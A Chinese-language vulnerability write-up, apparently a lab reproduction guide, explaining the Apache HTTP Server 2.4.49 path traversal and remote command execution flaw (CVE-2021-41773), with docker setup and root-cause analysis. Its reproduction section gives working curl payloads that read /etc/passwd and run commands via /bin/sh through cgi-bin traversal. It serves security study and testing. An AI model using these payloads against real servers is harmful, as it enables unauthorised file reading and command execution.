Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)

Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)

0x01 漏洞简介

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中，引入了一个路径穿越漏洞，满足下面两个条件的Apache服务器将会受到影响：

• 版本等于2.4.49
• 穿越的目录允许被访问，比如配置了<Directory />Require all granted</Directory>。（默认情况下是不允许的）

攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令。

0x02 影响版本

Apache HTTP Server版本等于2.4.49

0x03 环境搭建

下载环境：https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773

执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器：

docker-compose build
docker-compose up -d

环境启动后，访问http://your-ip:8080即可看到Apache默认的It works!页面。

0x04 漏洞分析

Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码，然后判断是否存在…/的路径穿越符，如下所示：

当检测到路径中存在%字符时，如果紧跟的2个字符是十六进制字符，就会进行url解码，将其转换成标准字符，如%2e->.，转换完成后会判断是否存在…/。

如果路径中存在%2e./形式，就会检测到，但是出现.%2e/这种形式时，就不会检测到，原因是在遍历到第一个.字符时，此时检测到后面的两个字符是%2而不是./，就不会把它当作路径穿越符处理，因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测。

0x05 漏洞复现

穿越的目录允许被访问，比如配置了<Directory />Require all granted</Directory>。（在apache/conf/httpd.conf中，默认情况下是不允许的）

使用如下CURL命令来发送Payload（注意其中的/icons/必须是一个存在且可访问的目录）：

curl -v --path-as-is http://192.168.237.129:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可见，成功读取到/etc/passwd：

在服务端开启了cgi或cgid这两个mod的情况下（在apache/conf/httpd.conf中），这个路径穿越漏洞将可以执行任意命令：

curl -v --data "echo;id" http://192.168.237.129:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh